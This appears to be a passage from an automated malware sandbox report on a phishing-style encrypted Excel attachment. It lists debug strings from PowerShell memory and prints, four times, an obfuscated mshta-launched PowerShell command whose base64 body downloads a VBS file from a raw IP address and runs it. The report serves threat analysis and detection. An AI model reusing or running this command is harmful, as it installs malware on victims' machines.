                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdbhP0 source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: B3930000.0.drInitial sample: OLE indicators vbamacros = False
                Source: RFQ_0230909024SEPT.xla.xlsxInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                PowerShell case anomaly found
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
                Suspicious command line found
                Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
